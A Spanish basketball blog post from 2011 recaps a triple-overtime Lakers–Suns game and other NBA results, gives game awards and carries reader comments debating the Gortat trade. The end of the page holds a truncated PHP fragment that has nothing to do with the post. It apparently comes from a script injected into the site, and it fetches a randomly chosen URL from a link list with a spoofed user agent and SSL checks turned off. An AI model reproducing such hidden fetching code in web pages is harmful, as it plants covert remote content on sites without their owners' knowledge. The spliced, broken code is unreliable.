La Crónica (22/03/2011)

23 de March de 2011 por TheDeerHunter

276 puntos combinados, 3 prórrogas, 104 canastas, 28 de ellas triples, 108 rebotes, 64 asistencias… La enésima master class del señor Nash, la mejor actuación del año de Kobe rozando el triple doble (107ª ocasión en +40), también la mejor versión de Gortat, de Odom, de Frye… ¡y también de Artest! Canela fina la que disfrutaron los afortunados que anoche tenían butaca en el Staples. La última vez que se había visto algo así en LA fue en 1969 frente, no lo adivinaríais, los Warriors. No creo que andara ya Don Nelson liándola parda en aquellas fechas.

Los Lakers habían cuajado un buen partido colectivo antes de sonar la bocina del tiempo reglamentario. En el estado de forma en el que se encuentra Odom será una pena terrible quitarlo el próximo partido tras expirar la sanción a Bynum. Con 6 arriba a falta de un minuto parecía todo controlado pero se complicaron la vida. Mejor dicho, los triplazos de los Suns estuvieron a punto de hacer algo más que complicarles la vida a los locales. Aún tuvo una Vince para ganar.

Vimos de todo en tres tiempos extra alucinantes. Triple de Artest con los consiguientes besos al aire, polémica en una falta de 3 tiros de Odom a Frye y que éste ejecutó con pasmosa seguridad para forzar la 2ª prórroga, Pau obligado a anotar 2 tiros libres para forzar la tercera, canastones monumentales que sólo la Mamba negra es capaz de hacer y finalmente un robo decisivo de Artest con un mate que hizo saltar a más de uno de su asiento y a otros les permitió llegar a tiempo a trabajar. ¡Cómo está el perro de presa número 15 con todo lo que le hemos pelado este año (y algún otro año, para qué nos vamos a engañar)! En definitiva, un espectáculo de los que crean afición e importantísimo resultado para L.A. y su intento por asegurar ventaja campo contra los gallos del Este. Lamentablemente no podemos decir lo mismo de los Suns (137-139).

Son los Bulls los que ahora están en condiciones de mirar por el retrovisor a sus rivales de conferencia así como a equipos como Lakers. Anoche Rose y los suyos le dieron otra soberana paliza a los Hawks, que ya deben de estar acostumbrados (114-81). Rose y Deng bestiales y el mejor de los Hawks Jeff Teague. Con esto lo digo todo.

Los Blazers también le dieron una buena a unos Wizards lamentables y eso que Roy hizo el partido malo de su vida (76-111). Extraordinario Gerald Wallace, que vuelve a recordar a su versión all-star. Por los Wizards es difícil destacar a nadie.

PREMIOS

MVP: Kobe Bryant se quedó a una sola asistencia del triple doble. El escolta de los Lakers aprovechó los 48 minutos que jugó para irse a los 42 puntos, 12 rebotes y 8 asistencias. Pero permitidme que destaque por encima de Kobe a Derrick Rose. ¡30 puntos y 10 asistencias en apenas 29 minutos! Demasiado para Atlanta.

Rookie: 9 puntos, 3 rebotes, 7 asistencias y 3 robos. No fue un mal partido el de John Wall pero todavía ha de controlar las pérdidas y mejorar su acierto en el tiro.

Sorpresa: A priori se podía pensar que la llegada de Gerald Wallace afectaría muy negativamente a Nicolas Batum pero anoche no fue el caso. El francés se fue a los 22 puntos y 12 rebotes en la carnicería que montaron los Blazers con los Wizards.

Decepción: En un partido de 3 prórrogas parece complicado no pasar de los 2 puntos pero anoche lo consiguió Dereck Fisher. 0 de 7 en tiros en los 46 minutos que estuvo sobre la cancha. Ningún problema, no era un partido de playoffs.  Brandon Roy también  se solidarizó con él registrando un 0 de 6.

Esfuerzo en vano: El de los Phoenix Suns, sin duda. Tras 3 prórrogas y 137 puntos se quedaron a las puertas del triunfo. ¡Pero que partido nos ofrecieron junto los Lakers!

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. Busky23 dice:
    #1

    😀 yo soy uno de los que ha llegado justo justo al trabajo,pero quien se iba a perder semejante espectáculo???
    Enorme partido justo un poco después del partidazo de ayer en el Palau blaugrana,vaya crack Diamantidis…
    Enorme partido,con Artest marciales resolviendo y un montón de jugadores haciendo numerazos,lastima el triple doble de Kobe que tuvo 2 prorrogas para hacer la décima asistencia.
    Mejor récord de la NBA en el ultimo mes,esto ya huele a playoffs.
    Derrick Rose is at another level.

      Citar

  2. Denise dice:
    #2

    Wow, que orgia de puntos y de triples.
    Lástima, no lo he podido ver, pero solo con ver el resumen se me ponen los pelos de punta.
    Que Artest está mejor se demuestra en el brinco que ha pegado para machacar, antes ni rozaba el aro.
    Viendo el boxscore, por qué Brooks ha jugado tan poco cuando ha hecho buenos numeros en lo poco que ja jugado?
    jja, el entrenador de los Suns siempre hace lo mismo, pone a Lopez de titular juega los 4 primeros minutillos del primer y tercer cuarto, y a partir de ahí, la maquina polaca de Gortat. Tremendo el temporadón que está haciendo, aunque a mi no me sorprende, siempre he confiado en que podía hacer estos numeros.

      Citar

  3. TheDeerHunter dice:
    #3

    Lo de Gortat es para agarrar a Van Gundy y…

      Citar

  4. Denise dice:
    #4

    No….
    Tenemos al MVP de la temporada en nuestro equipo. Cierto es que Gortat sería un recambio de lujo por si Superman se lesiona, pero, no es viable estar pagandole 7 kilos al año a alguien para que juegue 12 minutos por partido y para tenerlo en el banco aburrido por si algun dia Howard se lesiona. .., porque Gortat y Howard no pueden jugar juntos como si lo pueden hacer Pau y Bynum. Ninguno de los dos tiene el tirito de 5-6 metros de Pau ni todos sus recursos ofensivos.
    Orlando lo hizo bien, lo renovó con el objetivo de luego sacar algo a cambio de él, como han hecho. Yo no veo mal la jugada.

      Citar

  5. Viva_Dirk dice:
    #5

    Han sacado poco o no han sacado lo que necesitaban, visto el nivel de unos y otros.

      Citar

  6. TheDeerHunter dice:
    #6

    Pues no lo entiendo Denise… cómo de lo que había se ha pasado a lo que hay, que según tú mismo es una plantilla cogida por hilos (para ser campeones) si se han hecho las cosas bien.
    Con lo que se cotizan los Pívots y más en un equipo como Phoenix… creo que algo ha fallado.

    Por cierto, no hemos dicho nada… pero finalmente Gay se pierde lo que queda de temporada.

      Citar

  7. Cocinitas dice:
    #7

    Estos playoffs creo q van a tener un claro color amarillo, vaya racha llevan desde el allstar. Increible partido anoche, lo de kobe impresionante, y nash dio una lecciòn a toda la hornada de nuevos bases. Alguien de verdad ve capaces a heat, bulls o celtics ( habrá q verlos con los o’ neil) de ganar unas finales a estos lakers????

      Citar

  8. Denise dice:
    #8

    Vamos a ver, los Magic no “necesitaban” a Gortat. Ellos tienen el mejor pivot de la NBA, si los Magic flojean no es porque el puesto de pivot lo tenga mal cubierto, sino porque a Arenas se le paga un pastón y no hace nada; Turkoglu y Redick son muy irregulares, y los 2 fichajes del verano (que ninguno es pivot) no valen un duro. Con Howard, los Magic tienen más que cubierto el puesto de 5, y para darle sus 12 minutitos de descanso, es mejor que se lo de Clark que no es tan bueno como Gortat pero cobra como 4 veces menos, que el polaco.
    Tu que eres de Lakers…¿Crees que Kupchak le daría a Shannon Brown 7 kilos al año para que le aporte los 16 minutos de calidad y descanso que le da a Bryant? Pues seguro que no. Para eso, intentaría tirar de algo más barato aunque no diese el rendimiento deportivo de Brown. Pues algo similar con el polaco.

      Citar

  9. Denise dice:
    #9

    Por cierto, el 9 de 25 de Pau es uno de los peores % del catalán que recuerdo. ¿Se debió a la defensa de Gortat o simplemente que no le entraron los tiros?

      Citar

  10. Len Bias dice:
    #10

    Denise, lo que se discute no es que se haya hecho bien en traspasar a Gortat, si no que lo que se ha obtenido a cambio ha sido muy poco para como están de cotizados los pivots.

      Citar

  11. Sancho88 dice:
    #11

    Las pérdidas de John Wall suceden porque el chiquillo a veces se olvida de que lleva un balón en las manos y se pone a correr los 100 metros lisos. Es espectacular su velocidad, pero debería calmarse, jejje. Lástima, yo me perdí por sueño el partido de LA, con lo q me gustan las orgias de puntos, jeje. Vi el de Chicago y ya comenté en el anterior post. Lo de Rose fue la hostia. Va a estar reñidísimo el MVP esta temporada, aunque he de reconocer que es favorito el de Chicago por la clasificación de su equipo y el golpe moral de ver un nuevo MVP en los Bulls despues de tantos años. Y sí, Gortat es un pedazo de jugón. Pero quien iba a pensar que con J-Rich y Arenas los Magic lo echaran en falta?

      Citar

  12. Denise dice:
    #12

    Joer, se ha obtenido a J-Rich, Turkoglu y Clark (recambio barato de Howard)
    No saqueis las cosas de su sitio, los Magic no echan de menos a Gortat, no tienen problemas para anotar, rebotear o defender en la pintura. Al que echa de menos es a Arenas.
    De todas formas, estais drmataizando la temporada de los Magic, cierto es que no tiene pinta de poder ganar el anillo como años anteriores, pero están a 3 victorias de los reforzadisimos Heat y a 6 de los campeonisimos Lakers.
    Hay un montón de equipos a los que pegarle palos antes que a los Magic.

    Por cierto, el año que viene cada vez está mas claro que quien les de los minutillos de descanso a Howard va a ser Fran Vazquez. Incluso si se adapta bien, podrían jugar a veces juntos.

    PD: Id reservando el MVP de la cronica de mañana para Howard, que esta noche él solito destrozará a los Knicks 🙂

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>